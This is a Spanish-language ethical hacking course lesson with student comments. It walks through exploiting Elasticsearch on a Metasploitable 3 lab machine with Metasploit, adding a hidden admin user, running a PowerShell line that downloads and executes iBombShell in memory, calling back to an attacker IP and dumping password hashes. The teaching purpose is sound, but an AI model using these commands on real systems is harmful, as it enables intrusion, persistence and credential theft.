Bienvenida y panorama general

1

Lo que aprenderás sobre el hacking ético

2

Conceptos básicos sobre hacking ético

3

Vulnerabilidades

4

Amenazas y ataques comunes

5

Instalación del entorno de pruebas Kali Linux

6

Instalación del entorno de pruebas Mutillidae

7

Instalación del entorno de pruebas Metaesplotaible 3

8

Práctica: Cross-Site-Scripting, command injection y directorio transversal

Introducción al Hacking Ético

9

Fases del hacking

10

¿Qué es hacking y hacker? Tipos de hacker

11

Práctica: Obteniendo información de fuentes abiertas con OSINT Framework y Google hacking

12

Práctica: Analizar un sitio web con Nikto y Spiderfoot

13

¿Es necesario un hacking ético? Hacking ético como profesión

Pentesting

14

Conceptos. ¿Qué es y qué no es una pentesting?

15

Tipos de pentesting. Fase Pre-ataque

16

Práctica: Buscando secretos en repositorios GIT

17

Introducción al escaneo de redes

18

Práctica: Escaneo de redes con Nmap

19

Fase de Ataque. Testing de aplicaciones web con Burp suite

20

Práctica: Explotando vulnerabilidades en metasploitable

21

Fase Post-ataque. Metodologías

Estándares y aspectos legales

22

PCI DSS. HIPAA. DMCA.ISO/IEC 27001

23

Contratos, Reglas de compromisos, Cláusula de no competencia y Acuerdo de confidencialidad

24

Convenio de Budapest. ¿Cómo vamos en América latina? Salvaguarda de evidencias digitales

Casos típicos de ataques

25

Malware y Análisis estático de malware

26

Malware y Análisis dinámico de malware

27

Sniffing y Cómo realizar un ataque Man in the middle automatico

28

Sniffing y Cómo realizar un ataque Man in the middle manual

29

Denegación de servicio. Ataque DOS con LOIC y HOIC

30

Ingeniería social

Controles y mecanismos de seguridad

31

Políticas de seguridad. Seguridad física y Controles de acceso

32

Práctica: Bypass autenticación QR (Reto 6 SANS Holiday hack)

33

Copias de seguridad. Defensa en lo profundo

34

Práctica: instalación del IDS snort

35

Gestión de riesgos y modelado de amenazas

Fase Post-ataque. Metodologías

21/35

Lectura

Para esta práctica se aprovechará la vulnerabilidad de elasticsearch en Metasploitable 3. Para esto iniciamos msfconsole y seleccionar el exploit a utilizar con el comando use de la herrramienta:
Use exploit/multi/elasticsearch/script_mvel_rce
Captura de Pantalla 2019-04-29 a la(s) 17.57.27.png

Nota: es importante agregar el RHOST que será el equipo objetivo.
Nos devolverá una Shell Meterpreter.
Captura de Pantalla 2019-04-29 a la(s) 17.58.07.png

Con el comando pwd mostrará la dirección donde te encuentras.
Captura de Pantalla 2019-04-29 a la(s) 17.58.21.png

Para obtener el número de proceso mediante getpid.
Captura de Pantalla 2019-04-29 a la(s) 17.58.38.png

El usuario se obtiene con:
Captura de Pantalla 2019-04-29 a la(s) 17.59.00.png

Para conocer mayores detalles del sistema operativo
Captura de Pantalla 2019-04-29 a la(s) 17.59.10.png

Con el comando ps se mostrarán los procesos corriendo dentro del sistema.
Captura de Pantalla 2019-04-29 a la(s) 17.59.22.png

Conocer su tabla ARP ayudará determinar rápidamente equipos dentro de la red.
Captura de Pantalla 2019-04-29 a la(s) 17.59.36.png

Obteniendo una Shell del sistema y utilizando escritorio remoto
Se ejecuta el comando Shell.
Captura de Pantalla 2019-04-29 a la(s) 17.59.47.png

Obteniendo los usuarios.
Captura de Pantalla 2019-04-29 a la(s) 17.59.58.png

Agregar un usuario de nombre pedro y el password pedro1234
Captura de Pantalla 2019-04-29 a la(s) 18.00.13.png

Después agregarlo al grupo de administradores con el comando:
Captura de Pantalla 2019-04-29 a la(s) 18.00.20.png

En otra terminal se ejecuta el comando:
Captura de Pantalla 2019-04-29 a la(s) 18.00.30.png

Hasta aquí todo bien, pero el tener un usuario extra es muy evidente y el administrador de sistemas puede sospechar rápidamente. Por lo cual se hará uso de la herramienta Ibombshell la cual está escrita en Powershell que permite rápidamente obtener funcionalidades post-exploit en cualquier instante y sistema operativo a través de un repositorio de Github.
Es una shell remota que se carga directamente en memoria sin ser almacenado en disco, por lo cual se dejan menos rastros y proporciona acceso a una gran cantidad de características de pentesting.
Captura de Pantalla 2019-04-29 a la(s) 18.00.43.png

Jugando con IbombShell
En el equipo donde se encuentra Kali Linux se descarga el repositorio de “ibombshell” en el siguiente enlace.
https://github.com/ElevenPaths/ibombshell

Se extrae la carpeta en el directorio de su elección para este ejercicio en la carpeta descargas.
https://github.com/ElevenPaths/ibombshell/archive/master.zip

Para descomprimir con el comando unzip ibombshell-master.zip
Captura de Pantalla 2019-04-29 a la(s) 18.00.54.png

Se ingresa a la carpeta ibombshell-master/ibomshell c2
Captura de Pantalla 2019-04-29 a la(s) 18.01.05.png

Ejecutar el comando pip install -r requirements.txt para instalar.
Captura de Pantalla 2019-04-29 a la(s) 18.01.12.png

Para iniciar e ingresa pyhton3 ibombshell.py, con lo cual aparecerá la siguiente pantalla una vez terminada la carga.
Captura de Pantalla 2019-04-29 a la(s) 18.01.36.png

Se crea un listener, para esto es necesario cargar el módulo.
load modules/listener.py
Captura de Pantalla 2019-04-29 a la(s) 18.01.51.png

Para ver las opciones que presenta el módulo se ejecuta el comando “show”
Captura de Pantalla 2019-04-29 a la(s) 18.02.04.png

Se puede utilizar los parámetros por defecto, pero si el puerto de escucha se encuentra ocupado pueden utilizar otro sin problema. Para iniciar el módulo con el comando “run”, quedando a la escucha en espera de una conexión.
Captura de Pantalla 2019-04-29 a la(s) 18.02.19.png

Para realizar una conexión, en el equipo donde se encuentra instalado Metaploitable 3 se inicia escritorio remoto y con el usuario previamente creado:
Usuario: pedro
Password: pedro1234
Captura de Pantalla 2019-04-29 a la(s) 18.02.39.png

Se prosigue a abrir Powershell y se ejecuta el siguiente comando para obtener una consola de Ibombshell.
iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/ElevenPaths/ibombshell/master/console’)
Captura de Pantalla 2019-04-29 a la(s) 18.02.49.png

Para obtener una consola que se comunique con nuestro equipo se ejecuta el comando:
console -Silently -uriConsole http://192.168.2.5:8080
Captura de Pantalla 2019-04-29 a la(s) 18.03.00.png

Al ejecutar el comando anterior, se mostrará en nuestro módulo de Ibombshell un nuevo warrior (Equipo conectado).
Captura de Pantalla 2019-04-29 a la(s) 18.03.09.png

Para ver el listado de los warrios se ejecuta el comando:
Warrior list
Captura de Pantalla 2019-04-29 a la(s) 18.03.15.png

Se configura el módulo para establecer la comunicación.
Captura de Pantalla 2019-04-29 a la(s) 18.03.24.png

Después se selecciona el warrior
Captura de Pantalla 2019-04-29 a la(s) 18.03.33.png

Se manda una instrucción en este caso “whoami”
Captura de Pantalla 2019-04-29 a la(s) 18.03.40.png

Con el comando run se mostrará el resultado
Captura de Pantalla 2019-04-29 a la(s) 18.03.52.png

Para obtener las credenciales del equipo basta con carga el módulo:
Load modules/credentials/invoke-powerdump.py
Captura de Pantalla 2019-04-29 a la(s) 18.04.01.png

Se establece el warrior que sigue siendo el mismo.
Captura de Pantalla 2019-04-29 a la(s) 18.04.07.png

Se ejecuta con el comando “Run” y se obtienen los usuarios junto con los hashes de las contraseñas.
Captura de Pantalla 2019-04-29 a la(s) 18.04.15.png

Entre otras cosas interesante que permite Ibombshell es desactivar el análisis en tiempo real de Windows Defender, bypass de UAC, obtener llaves SSH y realizar movimientos laterales. Como pueden observar una herramienta muy interesante que debemos añadir en nuestro arsenal.

Repo GitHub : https://github.com/ElevenPaths/ibombshell

Aportes 15

Preguntas 2

Ordenar por:

¿Quieres ver más aportes, preguntas y respuestas de la comunidad? Crea una cuenta o inicia sesión.

“Great power involves great responsibility”
Franklin D. Roosevelt
cita original
“Today we have learned in the agony of war that great power involves great responsibility. Today we can no more escape the consequences of German and Japanese aggression than could we avoid the consequences of attacks by the Barbary Corsairs a century and a half before.
We, as Americans, do not choose to deny our responsibility.”

Tengo una duda. y viene referente al comentario anterior.
supongamos que no creo el usuario remoto. ya que al momento de explotar el elasticsearch, nos da permisos de administrador.

podriamos ejecutar el powershell desde lineas de comandos llendo ala direccion.
C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe
desde alli suministrar el comando.
iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/ElevenPaths/ibombshell/master/console’)
posteriormente.
console -Silently -uriConsole http://192.168.2.5:8080

Al ejecutar el payload dice “java has not been ecexuted, aborting…” y no me deja ingresar a la máquina metasplotable

Buen dia profe, tengo problemas al ejecutar el ibombshell, me aparece el siguiente error https://imgur.com/qBumcEY aun asi teniendo el python 3.6 https://imgur.com/QApoeyB mas sin envargo leyendo entre el post de github note que hay que tener instalado powershell en el kali, el problema esta que al instalarlo siguiendo los pasos desde la pagina https://www.kali.org/tutorials/installing-powershell-on-kali-linux/ ya al final me salta el siguiente error https://imgur.com/f9ILSQm y de hay no he podido pasar

Buena lectura

Buenas tardes.cuando ejecuto el exploit multi/elasticsearch me dice que est :java has no be executed,aborting.Por que puede ser?

muchas gracias

Excelente laboratorio.

Se puede escalar de privilegios en un objetivo mediante el UAC, donde igual podemos obtener la contraseña de inicio de sesión.

Duda, siguiendo los pasos me doy cuenta que la opción de acceso remoto se encuentra deshabilitada por defecto. como podría activarla desde la shell(cmd) que se creo.

ya que trato de conectarme via rdesktop ip -u “usuario” -p “contraseña” y la coneccion es unable.
probe desde una terminal windows (cliente remoto) y sigue presentandose.

Excelente documento.
Pregunta. Tengo problemas para abrir Nessus, me dice que la base de datos esta corrupta. He buscado pero no logro solucionarlo. Algun companero con el mismo problema?

¿Cómo llegamos a la conclusión que el equipo metasploitable tiene la vulnerabilidad de elasticsearch? He ralizado un escaneo con Nessus y no ha encontrado dicha vulnerabilidad. Gracias.

Muy util esta Practica, sin embargo me toco para efectos del ejercicio crear el usuario pedro directamente en la maquina con metaexploitable3 ya que el creado a través de Kali nunca lo vi reflejado.
Posterior a lo anterior es una excelente clase…

Hola a todos
Disculpen para que se creó ibombshell y que es eso de los guerreros (warriors)
y de paso alguien puede explicar que se está haciendo exactamete a partir de que empezamos con lo de ibombshell
porfa alguien que mande mas info porque me quedé a medias JSJSJS 🤣🤣🤣🤣

Excelente practica, sin embargo al crear desde mi maquina de Kali el usuario pedro este nunca se me vio reflejado en la maquina donde esta instalado el metaexploitable3, por lo anterior y para efectos del laboratorio la cree directamente pudiendo así realizar la practica.

de esta practica me quedo la inquietud de si al momento de crear el usuario pedro nunca le asigne privilegios de administrador como como podría a través de este ejecutar Powershell?.

En líneas generales me parece un laboratorio muy interesante y enriquecedor.